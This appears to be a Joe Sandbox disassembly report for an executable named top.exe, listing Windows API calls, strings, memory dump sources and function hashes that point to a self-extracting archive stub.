                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                  • String ID:
                                                                  • API String ID: 1868215902-0
                                                                  • Opcode ID: 030a297b4cba9b1f232e3492a03830821b13d07e3e64b3cc0ea0154ebbd25be0
                                                                  • Instruction ID: c31f0b6b01b66d78a7b5ff2d1065105aa7ffc82ccf8bb7ae09c095d064773069
                                                                  • Opcode Fuzzy Hash: 030a297b4cba9b1f232e3492a03830821b13d07e3e64b3cc0ea0154ebbd25be0
                                                                  • Instruction Fuzzy Hash: F5015271500744EFC7229F64DD84BCABBA9FB09B11F00092EF16A52164D7B57A44DB98
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0047C817
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 0047C829
                                                                  • _free.LIBCMT ref: 0047C83B
                                                                  • _free.LIBCMT ref: 0047C84D
                                                                  • _free.LIBCMT ref: 0047C85F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 4342af63eb0382b2bf6300c9a16bf31d149f227bd70db16f3dd1fb561532c18f
                                                                  • Instruction ID: 206e6526db0a0c96c30577fda371fef6aaf59767be1bc0c2e20fce55720f31a3
                                                                  • Opcode Fuzzy Hash: 4342af63eb0382b2bf6300c9a16bf31d149f227bd70db16f3dd1fb561532c18f
                                                                  • Instruction Fuzzy Hash: C9F0FF32544600AF8620EB6AF5C9C9B73E9AB207257659C2FF10CD7652CB78FC808B5D
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00461FE5
                                                                  • _wcslen.LIBCMT ref: 00461FF6
                                                                  • _wcslen.LIBCMT ref: 00462006
                                                                  • _wcslen.LIBCMT ref: 00462014
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0045B371,?,?,00000000,?,?,?), ref: 0046202F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CompareString
                                                                  • String ID:
                                                                  • API String ID: 3397213944-0
                                                                  • Opcode ID: 42ee6a65312eda9c739486db3e2f452d859c84b3774345e4c25a41a9fb176d02
                                                                  • Instruction ID: 0ea895898a71a35e80718591db0f258b6e46c158e01696632ae0cacb02bf1716
                                                                  • Opcode Fuzzy Hash: 42ee6a65312eda9c739486db3e2f452d859c84b3774345e4c25a41a9fb176d02
                                                                  • Instruction Fuzzy Hash: 54F09032008014BFCF221F51EC09DCE3F26EB45775B11C41AF61A5B061CB72DAA1E6D9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf
                                                                  • String ID: %ls$%s: %s
                                                                  • API String ID: 589789837-2259941744
                                                                  • Opcode ID: afca70c29c16e0daff6a351436dc34c468a51f5959c1475cf9d60cda1dc20f55
                                                                  • Instruction ID: 2cc11a9d4b6d4f42404c8e437e32316c4ce081352ba27237a9b77acf34cc1d1d
                                                                  • Opcode Fuzzy Hash: afca70c29c16e0daff6a351436dc34c468a51f5959c1475cf9d60cda1dc20f55
                                                                  • Instruction Fuzzy Hash: 2D513B39288304F7E6252691CD46F367265AB04B09F2C450BF787A50F2F9AFA911671F
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\top.exe,00000104), ref: 00477FAE
                                                                  • _free.LIBCMT ref: 00478079
                                                                  • _free.LIBCMT ref: 00478083
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Users\user\Desktop\top.exe
                                                                  • API String ID: 2506810119-4088511088
                                                                  • Opcode ID: 6a4e289386b4b96021597be8c27a345ee602d64f9465f314c04bafbd71bdc195
                                                                  • Instruction ID: ed0daaf9c1ae687fc937d1f4072e25811fd11c1ffe52b202b848747225f3a61c
                                                                  • Opcode Fuzzy Hash: 6a4e289386b4b96021597be8c27a345ee602d64f9465f314c04bafbd71bdc195
                                                                  • Instruction Fuzzy Hash: 7531C270A40248AFDB21DF99C988DDEBBBCEB85314F11816FF50897211DA748E44CB59
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004731FB
                                                                  • _abort.LIBCMT ref: 00473306
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer_abort
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 948111806-2084237596
                                                                  • Opcode ID: 49721589d6e6d93cb1338a24b834f6e176641c2de5a6bdc819fbd86bb4fe3ca3
                                                                  • Instruction ID: 0462b65eb5b8aafb3cecc4e92a4a873ac744209a2a68f4b08c06e13d73ef33eb
                                                                  • Opcode Fuzzy Hash: 49721589d6e6d93cb1338a24b834f6e176641c2de5a6bdc819fbd86bb4fe3ca3
                                                                  • Instruction Fuzzy Hash: 75414C71900109AFCF15DF94CD85AEEBBB6BF48305F14809AF90867222D3399A50EB59
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00457406
                                                                    • Part of subcall function 00453BBA: __EH_prolog.LIBCMT ref: 00453BBF
                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004574CD
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689

APIs
  • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
  • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
• EndDialog.USER32(?,00000001), ref: 0046AD98
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0046ADAD
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0046ADC2
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367

APIs
• DialogBoxParamW.USER32(GETPASSWORD1,00010424,0046B270,?,?), ref: 0046DE18
Strings
Similarity
• API ID: DialogParam
• String ID: GETPASSWORD1$rF$xzJ
• API String ID: 665744214-4100369387

APIs
• __fprintf_l.LIBCMT ref: 0045D954
• _strncpy.LIBCMT ref: 0045D99A
  • Part of subcall function 00461DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00491030,00000200,0045D928,00000000,?,00000050,00491030), ref: 00461DC4
Strings
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443

APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0045AC5A,00000008,?,00000000,?,0045D22D,?,00000000), ref: 00460E9F
Strings
• Thread pool initialization failed., xrefs: 00460EB7
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853

APIs
Strings
Similarity
• API ID: Malloc
• String ID: (F$2F$A
• API String ID: 2696272793-2592254738

Strings
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855

APIs
  • Part of subcall function 0045E2E8: _swprintf.LIBCMT ref: 0045E30E
  • Part of subcall function 0045E2E8: _strlen.LIBCMT ref: 0045E32F
  • Part of subcall function 0045E2E8: SetDlgItemTextW.USER32(?,0048E274,?), ref: 0045E38F
  • Part of subcall function 0045E2E8: GetWindowRect.USER32(?,?), ref: 0045E3C9
  • Part of subcall function 0045E2E8: GetClientRect.USER32(?,?), ref: 0045E3D5
• GetDlgItem.USER32(00000000,00003021), ref: 0045135A
• SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
Strings
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: F$0
• API String ID: 2622349952-10944669

APIs
• SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0046DBF4
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0046DC30
Strings
Similarity
• API ID: EnvironmentVariable
• String ID: sfxcmd$sfxpar
• API String ID: 1431749950-3493335439

APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0

APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00457F69,?,?,?), ref: 0045A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00457F69,?), ref: 0045A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00457F69,?,?,?,?,?,?,?), ref: 0045A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00457F69,?,?,?,?,?,?,?,?,?,?), ref: 0045A4C6
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004791E0,?,00000000,?,00000001,?,?,00000001,004791E0,?), ref: 0047C9D5
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0047CA5E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00476CBE,?), ref: 0047CA70
• __freea.LIBCMT ref: 0047CA79
  • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: c54249795789bc2a2c73d3f1d0463a820bf9b0a1da25e8066f0f49e19532121b
• Instruction ID: 2474f481ea2f5868ffe56f9fd099ef1826bf67647caefeb37c0d877e7521cae0
• Opcode Fuzzy Hash: c54249795789bc2a2c73d3f1d0463a820bf9b0a1da25e8066f0f49e19532121b
• Instruction Fuzzy Hash: 4E31F072A0020AABCF24CF65CC85EEF7BA5EB41711B04812EFC08E6250EB39CD50CB94
APIs
• GetDC.USER32(00000000), ref: 0046A666
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0046A675
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046A683
• ReleaseDC.USER32(00000000,00000000), ref: 0046A691
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 2e998e3b9b5c211648aeced6a31fc04b2054ec0a4e02de188bbb1867301de1ec
• Instruction ID: 5d139e94114ab90d6d9124b4c864e77e0f3093cfe07441ddc0eb5249aeddd582
• Opcode Fuzzy Hash: 2e998e3b9b5c211648aeced6a31fc04b2054ec0a4e02de188bbb1867301de1ec
• Instruction Fuzzy Hash: 96E0CD31942721B7C3106F65BC0DB8B3E24AF15B53F004232F605951D4EB7445008BD9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcschr
• String ID: .lnk$dF
• API String ID: 2691759472-987548045
• Opcode ID: 239639e55d03d9533d19cd5a0ec1c87c4840231d24f6432ddfa62d55a52c2922
• Instruction ID: a3530db7fc038c4cc48c4f9ccec7194a9d2cc7083b1242b41abaefe5ec5a7344
• Opcode Fuzzy Hash: 239639e55d03d9533d19cd5a0ec1c87c4840231d24f6432ddfa62d55a52c2922
• Instruction Fuzzy Hash: D1A15072D0022996DF24DBA1CD45EFB73FC9F45304F0885E7B509E3241EE789A858B6A
APIs
• _free.LIBCMT ref: 0047B324
  • Part of subcall function 00479097: IsProcessorFeaturePresent.KERNEL32(00000017,00479086,00000050,00483A34,?,0045D710,00000004,00491030,?,?,00479093,00000000,00000000,00000000,00000000,00000000), ref: 00479099
  • Part of subcall function 00479097: GetCurrentProcess.KERNEL32(C0000417,00483A34,00000050,00491030), ref: 004790BB
  • Part of subcall function 00479097: TerminateProcess.KERNEL32(00000000), ref: 004790C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
• Instruction ID: 9644ec656fd213d174f9bcbacd228021034d2a5a8d7f1f0e314a8c4914ac1b8c
• Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
• Instruction Fuzzy Hash: 44518571D00109AFDF14DFA9C885AEEB7B5EF58314F2481AEE858E7341E7399E018B94
APIs
• __EH_prolog.LIBCMT ref: 004575E3
  • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
  • Part of subcall function 0045A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0045777F
  • Part of subcall function 0045A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
  • Part of subcall function 0045A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: File$Attributes$CloseFindH_prologTime_wcslen
• String ID: :
• API String ID: 3226429890-336475711
• Opcode ID: fee90ea7d7b5eb905dc3a1594e6f4c10c272a2e077a1d5ff74b3512caa23debe
• Instruction ID: a4b10064a087ed80d3c804be415e79d8a8584ec9efaedd55cf185a110c2a4813
• Opcode Fuzzy Hash: fee90ea7d7b5eb905dc3a1594e6f4c10c272a2e077a1d5ff74b3512caa23debe
• Instruction Fuzzy Hash: 2E419271800158AAEB21EB61DC55EDFB378AF45305F0040ABBA05A3193EB785F8DCB79
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcschr
• String ID: *
• API String ID: 2691759472-163128923
• Opcode ID: 203da8021a280b251de1601b75ef4c14c66c18db85f8914f836dec797da641ce
• Instruction ID: 233c10f795e44fbe45060d0204946ac20381be3e30d580c55d5b36ff08daccd8
• Opcode Fuzzy Hash: 203da8021a280b251de1601b75ef4c14c66c18db85f8914f836dec797da641ce
• Instruction Fuzzy Hash: 0E3139221043019ACB30AE15890267B73E5EF93B16F15851FFD8857243E76D8D8E93EA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: b882be2a8f4c9596b4417551074c564af1f1da2f6441145da79e9c2a9d284eb1
• Instruction ID: cf4dbfa8efdd319c52d705c906d3c20d9199266b31b826784b780afd02c99866
• Opcode Fuzzy Hash: b882be2a8f4c9596b4417551074c564af1f1da2f6441145da79e9c2a9d284eb1
• Instruction Fuzzy Hash: E821D1729043066AD731EA65D845AABB3ECDF81758F40042FF545C3242FB6D9D8883EB
APIs
  • Part of subcall function 0045F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0045F2E4
  • Part of subcall function 0045F2C5: GetProcAddress.KERNEL32(004981C8,CryptUnprotectMemory), ref: 0045F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0045F33E), ref: 0045F3D2
Strings
• CryptProtectMemory failed, xrefs: 0045F389
• CryptUnprotectMemory failed, xrefs: 0045F3CA
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: bddcdc614dc08f39e8dede50841c4c107538ec223b9a60471d6decdfc2b8fb46
• Instruction ID: 771d6582388a0024990c7b8919a923434eb3c63a9bd313c9fbfa62ab47f707dc
• Opcode Fuzzy Hash: bddcdc614dc08f39e8dede50841c4c107538ec223b9a60471d6decdfc2b8fb46
• Instruction Fuzzy Hash: 3D11E131600229ABEF15AF25D846A6E3B54EB01B66B10817BFC419B252DB3C9D0D879E
APIs
• CreateThread.KERNEL32(00000000,00010000,00461160,?,00000000,00000000), ref: 00461043
• SetThreadPriority.KERNEL32(?,00000000), ref: 0046108A
  • Part of subcall function 00456C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00456C54
  • Part of subcall function 00456DCB: _wcschr.LIBVCRUNTIME ref: 00456E0A
  • Part of subcall function 00456DCB: _wcschr.LIBVCRUNTIME ref: 00456E19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2706921342-3849766595
